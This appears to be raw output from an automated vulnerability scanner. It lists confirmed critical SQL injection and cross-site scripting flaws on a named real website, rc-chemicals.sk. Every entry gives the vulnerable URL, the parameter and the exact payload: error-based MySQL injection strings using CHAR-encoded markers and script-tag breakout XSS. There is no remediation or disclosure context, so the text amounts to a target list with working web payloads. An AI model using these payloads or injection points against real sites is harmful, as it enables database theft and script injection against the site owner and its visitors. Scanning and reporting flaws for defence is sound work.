* SQL Injection

Severity :  Critical  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/pl,szukaj  
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="

Severity :  Critical  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/en,szukaj  
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="

* [High Possibility] SQL Injection

Severity :  Critical  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/pl,szukaj
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+" 

Severity :  Critical  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/en,szukaj  
Vulnerability Classifications:  PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: "+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+"

* XSS (Cross-site Scripting)

Severity :  Important  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x0009BE)</script>&page=2  
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79 
Parameter Name: lang 
Parameter Type: Querystring 
Attack Pattern: '"--></style></script><script>alert(0x0009BE)</script> 

Severity :  Important  
Confirmation :   Confirmed  
Detection Accuracy :   
Vulnerable URL :  http://rc-chemicals.sk/index.php?lang='"--></style></script><script>alert(0x000BE5)</script>&page=3  
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79  
Parameter Name: lang 
Parameter Type: Querystring 
Attack Pattern: '"--></style></script><script>alert(0x000BE5)</script> 

Severity :  Important  
Confirmation :   Confirmed  
Detection Accuracy :   
Vulnerable URL :  http://rc-chemicals.sk/pl,szukaj  
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: '"--></style></script><script>alert(0x000D2B)</script> 

Severity :  Important  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/en,szukaj  
Vulnerability Classifications:  PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: '"--></style></script><script>alert(0x001071)</script> 

* MySQL Database Identified

Severity :  Information  
Confirmation :   Confirmed  
Vulnerable URL :  http://rc-chemicals.sk/pl,szukaj  
Vulnerability Classifications:  -  
Parameter Name: szukaj 
Parameter Type: Post 
Attack Pattern: " and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or "1"="